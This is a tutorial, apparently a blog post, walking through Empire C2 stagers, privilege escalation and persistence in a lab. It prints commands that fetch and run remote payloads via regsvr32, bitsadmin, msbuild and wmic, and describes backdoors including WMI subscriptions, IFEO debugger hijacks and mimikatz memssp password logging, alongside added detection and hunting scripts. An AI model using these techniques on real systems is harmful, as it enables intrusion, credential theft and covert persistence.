Intranet penetration day15 Empire

Time: 2020-11-20

Empire (usestager usage, privilege escalation modules, persistence backdoors)

Premise of this chapter: a listener has already been set up successfully (see day14 for how to create the listener)

1. Several uses of usestager

windows/launcher_sct:

Introduction: regsvr32 is the Windows command-line tool for registering and unregistering COM components (DLLs and ActiveX controls). On Windows XP and later, regsvr32.exe lives in Windows\System32; on Windows 2000 it is in WinNT\System32. The stager abuses the /i switch, which passes an arbitrary string to the DLL's DllInstall entry point: scrobj.dll (the Windows Script Component runtime) accepts a URL there, fetches the scriptlet (.sct) and runs the script it contains.

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

/u unregisters (calls DllUnregisterServer), /s is silent (no message boxes), /n skips DllRegisterServer (must be combined with /i), /i[:cmdline] calls DllInstall and hands it cmdline.

1) usestager windows/launcher_sct enters the windows/launcher_sct module

2) Set the parameters

set Listener kali

set OutFile /var/www/html/xx.sct

3) Execute

4) Run on the target: regsvr32 /u /n /s /i:http://192.168.227.129/xx.sct scrobj.dll

5) The session comes back successfully

windows/launcher_vbs:

This stager produces a .vbs file, so it has to reach the target's disk first. A convenient download tool is bitsadmin, which is present on Windows by default:

Remote download: bitsadmin /transfer <jobname> http://IP/xx.vbs <local path>

(the first argument after /transfer is a display name for the BITS job, not a switch)

1) usestager windows/launcher_vbs enters the windows/launcher_vbs module

2) Set the parameters (Listener and OutFile, as for the .sct stager; save the file under /var/www/html/)

3) Execute

4) Run on the target:

bitsadmin /transfer n http://192.168.227.129/xx.vbs C:\Users\xxx\Desktop\xx.vbs

5) Execute the downloaded .vbs file on the target (for example with cscript xx.vbs); the session comes back successfully

windows/launcher_xml:

MSBuild (the Microsoft Build Engine) is the build platform behind Visual Studio project files. Before Visual Studio 2013 it shipped only as part of the .NET Framework; since then Visual Studio carries its own copy, but the .NET Framework still installs one under C:\Windows\Microsoft.NET\Framework[64]\v4.0.30319, so MSBuild.exe is available on an ordinary Windows host that has no Visual Studio. Visual Studio depends on MSBuild, but MSBuild does not depend on Visual Studio.

Usage: the .NET 4.0 MSBuild compiles and runs inline C# tasks (UsingTask with CodeTaskFactory) straight from a project file. The stager is an XML project file whose inline task runs the Empire launcher, so "building" it with MSBuild.exe gives a shell without dropping a separate executable.

1) As in the previous two stagers, generate the XML file into the /var/www/html/ folder

2) Download the file onto the target (bitsadmin /transfer as above, or any other way)

3) On the target, cd to C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and run the XML with MSBuild: msbuild.exe xx.xml (use the Framework directory instead of Framework64 on a 32-bit system)

4) The session comes back successfully

windows/wmic:

wmic is the command-line front end to WMI (Windows Management Instrumentation); it lets you query and manage the system from the command line and from batch scripts. Its /format switch takes an XSL stylesheet used to render the output, and it will load that stylesheet from a URL and execute the script blocks embedded in it.

Usage: wmic os get /format:"http://IP/xx.xsl"

1) As in the previous stagers, save the generated .xsl file into the html folder

2) On the target run: wmic os get /format:"http://192.168.227.129/xx.xsl"

3) The session comes back successfully
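All four stagers above run through a signed Windows binary, so on the defensive side the thing to watch is the command line each one needs. The following is an added example, not part of the original post or of Empire: a PowerShell filter that classifies process-creation command lines (Security event 4688 with command-line auditing, or Sysmon event 1) against the four patterns, run over sample lines constructed for the demo. The server 192.168.227.129 and the xx.* file names are the walkthrough's values; the benign lines are made up for contrast.

```powershell
function Test-EmpireStagerCommandLine {
    # Classifies one process command line against the four LOLBin stagers used above.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$CommandLine
    )
    process {
        $hits = @()
        # windows/launcher_sct: regsvr32 handed a URL through /i: (scrobj.dll then runs the scriptlet).
        # A URL after /i: has no ordinary administrative use, so this rule is tight.
        if ($CommandLine -match 'regsvr32(\.exe)?\b.*/i:\s*"?(https?|ftp)://') {
            $hits += 'launcher_sct (regsvr32 /i: URL)'
        }
        # windows/launcher_vbs delivery: a BITS job pulling something over HTTP.
        if ($CommandLine -match 'bitsadmin(\.exe)?\b.*/transfer\b.*https?://') {
            $hits += 'launcher_vbs delivery (bitsadmin /transfer from URL)'
        }
        # windows/launcher_xml: MSBuild handed a project file. Loose on purpose; legitimate
        # builds match too, so pair it with an allow-list of build hosts or directories.
        if ($CommandLine -match 'msbuild(\.exe)?\b.*\.(xml|csproj|vbproj|proj)\b') {
            $hits += 'launcher_xml (msbuild inline task)'
        }
        # windows/wmic: /format: pointing at a remote XSL stylesheet.
        if ($CommandLine -match 'wmic(\.exe)?\b.*/format:\s*"?(https?|ftp)://') {
            $hits += 'wmic (remote XSL via /format:)'
        }
        [pscustomobject]@{
            Suspicious  = ($hits.Count -gt 0)
            Technique   = ($hits -join '; ')
            CommandLine = $CommandLine
        }
    }
}

# Constructed sample input: the first four mirror the lab, the last two are benign.
$samples = @(
    'regsvr32 /u /n /s /i:http://192.168.227.129/xx.sct scrobj.dll',
    'bitsadmin /transfer n http://192.168.227.129/xx.vbs C:\Users\Public\xx.vbs',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe xx.xml',
    'wmic os get /format:"http://192.168.227.129/xx.xsl"',
    'regsvr32 /s C:\Windows\System32\msxml3.dll',
    'wmic os get Caption,Version /format:list'
)

$samples | Test-EmpireStagerCommandLine | Format-Table -AutoSize -Wrap
```

The first four lines come out flagged with their technique and the two benign ones do not. The regsvr32 and wmic rules are specific enough to alert on directly; the msbuild rule is a triage rule and needs tuning on developer machines.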

2. Empire privilege escalation modules

UAC and bypassing UAC were covered in day14

Local privilege escalation

MS16-135: Win32k elevation of privilege

Bulletin MS16-135 (November 2016, Windows kernel-mode drivers) covers several Win32k bugs, among them an information disclosure; the one the Empire module exploits is the elevation of privilege bug. To exploit it, an attacker must log on to the affected system and run a specially crafted application. The security update fixes the vulnerabilities by correcting how the Windows kernel-mode driver handles objects in memory.

searchmodule ms16-135 finds the ms16-135 module

usemodule privesc/ms16-135

Set the parameters (at minimum the Listener) and execute

A session with elevated privileges comes back successfully

MS16-032: Secondary Logon elevation of privilege

An elevation of privilege vulnerability exists in Windows when the Secondary Logon service fails to properly manage request handles in memory. An attacker who successfully exploits this vulnerability can run arbitrary code as an administrator.

usemodule privesc/ms16-032

Set the parameters and execute

A session with SYSTEM privileges comes back successfully

powershell/privesc/sherlock finds local privilege escalation vulnerabilities on Windows

Sherlock checks the versions of the system files affected by a list of known local privilege escalation bugs and reports which patches appear to be missing; it only audits, it does not exploit anything.

usemodule privesc/sherlock uses this module

The output lists the local privilege escalation vulnerabilities that appear to be present

Raising privileges with PowerUp

PowerUp is a PowerShell tool for finding and abusing common Windows local privilege escalation misconfigurations: vulnerable services (modifiable service binaries or service configuration, unquoted service paths), DLL hijacking opportunities, weak registry settings, and similar. It was part of PowerTools, at https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp, and Empire implements PowerUp's checks and escalation functions in the privesc/powerup/* modules.

usemodule privesc/powerup/allchecks runs every PowerUp check and reports which misconfigurations can be exploited

The output lists the findings

Pick the module that matches the finding

Here you can see a service executable with improperly configured permissions (abused through the privesc/powerup/service_exe_* modules)

But I've tried all of them here, and they are not very easy to use
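Because the PowerUp modules did not work reliably in this lab, it helps to know what the check itself does. The following is an added example, not PowerUp's code or the post's: it reproduces the modifiable-service-binary check by hand in Windows PowerShell (3.0 or later, run in the agent's context or any shell on the target). It enumerates services, pulls each executable out of the service command line and reports the ones the current token can write to, which is exactly the precondition the privesc/powerup/service_exe_* modules need.

```powershell
function Get-ModifiableServiceBinary {
    # Lists services whose executable the current user can overwrite (or re-ACL and then overwrite).
    [CmdletBinding()]
    param()

    # SIDs carried by the current token: the user plus every group it belongs to.
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $tokenSids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

    # Rights that let us replace the file, plus the GENERIC_ALL / GENERIC_WRITE bits that
    # sometimes appear in ACEs and are not part of the FileSystemRights enum.
    $writeRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Modify, FullControl, TakeOwnership, ChangePermissions'
    $writeMask   = [int]$writeRights -bor 0x10000000 -bor 0x40000000

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        # The executable is the text up to the first ".exe", quoted or not. An unquoted path
        # with spaces is a separate PowerUp finding and is not handled here.
        if ("$($svc.PathName)" -match '^"?([^"]+?\.exe)') { $binary = $Matches[1] } else { continue }
        if (-not (Test-Path -LiteralPath $binary)) { continue }

        $acl = Get-Acl -LiteralPath $binary -ErrorAction SilentlyContinue
        if (-not $acl) { continue }

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try {
                $aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            } catch { continue }
            if ($tokenSids -notcontains $aceSid) { continue }
            # Compare as integers: the enum value may carry bits outside the named members.
            if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }

            [pscustomobject]@{
                Service   = $svc.Name
                StartName = $svc.StartName
                StartMode = $svc.StartMode
                Binary    = $binary
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Get-ModifiableServiceBinary | Format-Table -AutoSize -Wrap
```

One caveat when reading the output: in a medium-integrity shell of a user who is in Administrators, that group is still present in the token (as deny-only), so rights granted to Administrators get reported even though the running process cannot use them until UAC is passed; treat such hits as UAC bypass material rather than as a privilege escalation.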

3. Persistence backdoors

PowerBreach

Introduction: PowerBreach is a set of in-memory PowerShell backdoors that wait for a trigger of various kinds and then run the staging logic. Because they live only inside a running PowerShell process, they are gone once that process exits or the machine reboots.

persistence/powerbreach/deaduser - takes a user name and a switch for whether it is a domain account (as opposed to a local one). Every SleepSeconds the script checks whether the account still exists, and if not, triggers the staging logic. The backdoor does not require local administrator privileges.

Understanding: the backdoor watches whether the user name you set still exists; if the account is deleted or renamed, the check fails and the script brings back a shell

usemodule persistence/powerbreach/deaduser

View the required parameters with info

Set the related parameters (Listener, the user name to watch, the domain switch, SleepSeconds)

Execute

Rename the account AAA to BBB on the target

The shell comes back successfully

persistence/powerbreach/eventlog - queries the Security event log at intervals, looking for an event that contains a unique trigger value. The backdoor requires administrator permission, because reading the Security event log needs it.

usemodule persistence/powerbreach/eventlog uses the module

View the required parameters

Set the related parameters (the trigger keyword here is "hacker")

Execute

Open eventvwr on the target; when an event containing the keyword "hacker" (the trigger defined in the parameters above, change it to anything you like) shows up in the Security log

The session comes back successfully

Because the backdoor was planted with administrator rights, the returned session also has administrator rights

persistence/powerbreach/resolver - takes a host name to resolve and a trigger IP. Every SleepSeconds the script resolves the host name and, if it resolves to the trigger IP, runs the staging logic. The backdoor does not require local administrator privileges.

usemodule persistence/powerbreach/resolver

View the required parameters

Set the related parameters (the host name to resolve and the trigger IP, here 127.0.0.1)

Execute

On the target, make the chosen host name resolve to 127.0.0.1 (the trigger IP set above)

The shell comes back successfully

Userland

The persistence/userland/* modules provide reboot persistence from user mode (i.e. without administrative permissions). If a Listener is specified, the staging code for an Empire agent is generated automatically and used as the script logic to trigger.

persistence/userland/registry - sets a value under HKCU:\Software\Microsoft\Windows\CurrentVersion\Run that executes the launcher script, which is stored with whichever storage mechanism you choose (a registry value or an alternate data stream). Because the key is under HKCU, the script runs only when that user logs on.

usemodule persistence/userland/registry

View the required parameters

Set the related parameters

Execute

Log the user off the target and log in again; the shell session comes back successfully (a PowerShell window pops up briefly at login, which the user may notice)

persistence/userland/schtasks - creates a scheduled task that runs the script from whichever storage mechanism you chose. The task can fire at DailyTime (HH:mm format) or after the user has been idle for IdleTime seconds.

Understanding: the persistence itself is a scheduled task, not a registry entry; the registry (RegPath) is only where the launcher script is stashed, and the task's action reads it from there and runs it

usemodule persistence/userland/schtasks

View the required parameters

Set the related parameters (Listener, DailyTime or IdleTime, RegPath)

Execute

Log the user off the target and log in again; when the set time comes, the shell session comes back successfully

Elevated

The persistence/elevated/* modules provide reboot persistence from an elevated context (i.e. with administrative privileges). If a Listener is specified, the staging code for an Empire agent is generated automatically and used as the script logic to trigger.

Understanding: these modules plant a backdoor that runs with administrator rights

persistence/elevated/registry and persistence/elevated/schtasks are the same as the userland versions above, except that they require administrator permissions and therefore persist system-wide rather than for one user

persistence/elevated/wmi - creates a permanent WMI event subscription that fires the stored script logic. It can be triggered at DailyTime (HH:mm format) or AtStartup (when the system boots). This is fairly hard to detect and to remove.

Understanding: this is not a scheduled task and not a Run key; it is three WMI objects in the root\subscription namespace, an __EventFilter (the trigger condition), a CommandLineEventConsumer (the command to run) and a __FilterToConsumerBinding that joins them. The WMI service itself runs the consumer, so nothing shows up in the usual autorun locations.

usemodule persistence/elevated/wmi uses the module

View the required parameters

Set the related parameters (Listener, SubName, DailyTime or AtStartup)

Execute

Verify the subscription on the target by running the following in PowerShell: Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='Updater'" (SubName defaults to Updater; the WQL comparison is case-insensitive, so the lower-case 'updater' works too)

Restart the target; a shell with administrator permissions comes back successfully

misc

persistence/misc/debugger - in Empire 3.6.0 the persistence/debugger/* modules were merged into persistence/misc/debugger. It sets an Image File Execution Options "Debugger" value for one of the executables that can be launched from the RDP logon prompt before authentication (the accessibility helpers such as sethc.exe for Sticky Keys, utilman.exe, osk.exe, narrator.exe and magnify.exe); Windows then starts the "debugger" instead of the requested binary, as SYSTEM. By default the debugger is set to cmd.exe, which gives you a SYSTEM command prompt through RDP without actually logging on to the machine. The Binary parameter points the debugger at a different binary instead. If you want the debugger to trigger a stager, set the Listener parameter: a stager for that listener is generated and stored at the specified RegPath, and the debugger becomes a launcher that runs it. You can then trigger the stager from the RDP prompt before authentication, but note that once the RDP prompt closes (which happens after 30 seconds of inactivity) the staged agent is killed along with it.

usemodule persistence/misc/debugger uses the module

View the required parameters

Set the parameters (which binary to hijack, and Listener if you want an agent rather than cmd.exe)

Execute

Press Shift five times at the target's Windows 7 logon screen (the Sticky Keys trigger, which launches sethc.exe); a PowerShell window flashes by

A session with administrator rights comes back successfully

persistence/misc/memssp - installs the mimikatz memssp module, which logs every authentication event (user name and clear-text password of each logon) to C:\Windows\System32\mimilsa.log. It patches LSASS in memory, so it does not survive a reboot and has to be re-run after one.

usemodule persistence/misc/memssp uses the module

No parameters are needed; just run it

The mimilsa.log file appears in the target's System32 directory and fills up as users log on

persistence/misc/disable_machine_acct_change - stops the target from changing its computer account password (the account whose name ends in $) by setting DisablePasswordChange=1 under HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters. If you first run mimikatz/credentials/logonpasswords to dump the computer account's password, that password stays valid indefinitely, and you should have persistent access to the given system. A Cleanup option reverts the change.

After selecting this module you can run it directly; it needs no parameters beyond the optional Cleanup
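Every persistence module in this section leaves its footprint in a known place, so they can be hunted as a set. The following is an added example, not from the original post and not Empire's own code: a Windows PowerShell (3.0 or later, Get-WmiObject is not in PowerShell 7) hunt that checks the Run keys, scheduled task actions, the root\subscription namespace, the IFEO Debugger values, mimilsa.log, the Netlogon DisablePasswordChange flag, and live PowerShell processes for the memory-only PowerBreach backdoors. Run it elevated, since root\subscription, HKLM and System32 need it. Assumptions: the SubName 'Updater' is the module default used in this walkthrough, and the IFEO binary list is the set of accessibility helpers the logon screen can start; adjust both for your environment.

```powershell
function Find-EmpirePersistence {
    [CmdletBinding()]
    param(
        # Module default for SubName in this walkthrough; assumed, change to taste.
        [string]$WmiSubName = 'Updater',
        # Binaries the logon screen can start before authentication (IFEO targets).
        [string[]]$IfeoBinaries = @('sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe', 'displayswitch.exe')
    )
    $findings = New-Object System.Collections.Generic.List[object]
    $add = { param($Module, $Location, $Value)
        $findings.Add([pscustomobject]@{ Module = $Module; Location = $Location; Value = "$Value" }) }
    # What an Empire launcher command line looks like, whichever way it is stored.
    $launcher = 'powershell(\.exe)?.*(-enc|-nop|-noni|IEX|Get-ItemProperty|FromBase64String|-w (1|hidden))'
    $regMeta  = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

    # persistence/userland/registry (HKCU) and persistence/elevated/registry (HKLM): Run keys
    foreach ($hive in 'HKCU', 'HKLM') {
        $key = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Run"
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($regMeta -contains $p.Name) { continue }
            if ("$($p.Value)" -match $launcher) { & $add 'persistence/*/registry' "$key\$($p.Name)" $p.Value }
        }
    }

    # persistence/userland/schtasks and persistence/elevated/schtasks: task actions that run a launcher
    if (Get-Command Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($task in Get-ScheduledTask) {
            foreach ($action in $task.Actions) {
                $cmd = "$($action.Execute) $($action.Arguments)"
                if ($cmd -match $launcher) { & $add 'persistence/*/schtasks' "$($task.TaskPath)$($task.TaskName)" $cmd }
            }
        }
    }

    # persistence/elevated/wmi: filter, consumer and binding in root\subscription
    $ns = 'root\subscription'
    foreach ($c in @(Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer -ErrorAction SilentlyContinue)) {
        if ($c -and ($c.Name -eq $WmiSubName -or "$($c.CommandLineTemplate)" -match $launcher)) {
            & $add 'persistence/elevated/wmi' "CommandLineEventConsumer $($c.Name)" $c.CommandLineTemplate
        }
    }
    foreach ($f in @(Get-WmiObject -Namespace $ns -Class __EventFilter -ErrorAction SilentlyContinue)) {
        if ($f -and $f.Name -eq $WmiSubName) { & $add 'persistence/elevated/wmi' "__EventFilter $($f.Name)" $f.Query }
    }
    foreach ($b in @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue)) {
        # Any binding to a CommandLineEventConsumer is rare enough on a workstation to list outright.
        if ($b -and "$($b.Consumer)" -match 'CommandLineEventConsumer') {
            & $add 'persistence/elevated/wmi' '__FilterToConsumerBinding' "$($b.Filter) -> $($b.Consumer)"
        }
    }

    # persistence/misc/debugger: IFEO Debugger set on a binary the logon screen can start
    foreach ($exe in $IfeoBinaries) {
        $key = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$exe"
        $dbg = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { & $add 'persistence/misc/debugger' "$key\Debugger" $dbg }
    }

    # persistence/misc/memssp: the log the patched LSASS writes
    $log = Join-Path $env:SystemRoot 'System32\mimilsa.log'
    if (Test-Path -LiteralPath $log) { & $add 'persistence/misc/memssp' $log "$((Get-Item -LiteralPath $log).Length) bytes" }

    # persistence/misc/disable_machine_acct_change: Netlogon told never to rotate the machine password
    $netlogon = 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'
    $flag = (Get-ItemProperty -Path $netlogon -Name DisablePasswordChange -ErrorAction SilentlyContinue).DisablePasswordChange
    if ($flag -eq 1) { & $add 'persistence/misc/disable_machine_acct_change' "$netlogon\DisablePasswordChange" $flag }

    # persistence/powerbreach/*: memory-only, so the only trace is a live PowerShell with a launcher command line
    foreach ($proc in @(Get-WmiObject -Class Win32_Process -Filter "Name='powershell.exe'")) {
        if ($proc -and "$($proc.CommandLine)" -match $launcher) {
            & $add 'persistence/powerbreach/* (candidate)' "PID $($proc.ProcessId)" $proc.CommandLine
        }
    }

    return $findings
}

Find-EmpirePersistence | Format-Table -AutoSize -Wrap
```

A clean machine normally returns nothing from this: the one subscription Windows ships with in root\subscription (the SCM event log filter) uses an NTEventLogEventConsumer, not a CommandLineEventConsumer, so it is not listed. The $launcher pattern matches the shape of Empire's default PowerShell launcher; a launcher stored as an alternate data stream still shows up through the Run key or task action that reads it.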